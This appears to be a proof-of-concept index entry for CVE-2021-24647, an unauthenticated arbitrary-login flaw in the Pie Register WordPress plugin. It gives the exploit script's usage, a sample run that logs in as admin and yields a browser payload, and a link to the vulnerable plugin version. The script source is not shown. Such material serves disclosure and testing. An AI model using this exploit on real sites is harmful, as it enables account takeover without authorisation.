PoC details: f078a8bb10f46fff2c7915efd4cd182858326f75

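Related vulnerability
Title: WordPress plugin authorization issue vulnerability (CVE-2021-24647)
Description: WordPress is a blogging platform developed in PHP by the WordPress Foundation. It supports setting up personal blog sites on servers running PHP and MySQL. A WordPress plugin is an open-source application plugin for WordPress. A WordPress plugin contains an authorization vulnerability: a flaw in the Pie Register plugin's social login implementation allows an unauthenticated attacker to log in as any user on the site knowing only that user's ID or username.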
Description
CVE-2021-24647 Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login
Introduction
# CVE-2021-24647
CVE-2021-24647 Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login

Info
---

```
usage: exploit.py [-h] -w URL [-p PATH]

options:
  -h, --help            show this help message and exit
  -w URL, --url URL     URL of the WordPress site
  -p PATH, --path PATH  Path of the Login Page /login/ or /pie-registration/
```

How to use
---


```
$ python3 exploit.py -w http://wordpress.lan
The plugin version is below 3.7.1.6.
The plugin version is 3.7.1.4
Select a user:
1. admin
Enter the user ID: 1

Boom we were able to login as admin copy and paste the following in to your browser and refresh and you will be logged in.

data:text/html;base64,[...]
```

Vulnerable Plugin Download
[https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip](https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip)

File snapshot

```
[4.0K] /data/pocs/f078a8bb10f46fff2c7915efd4cd182858326f75
├── [8.1K] exploit.py
├── [ 34K] LICENSE
├── [1.7K] README.md
└── [   4] requirements.txt

0 directories, 4 files
```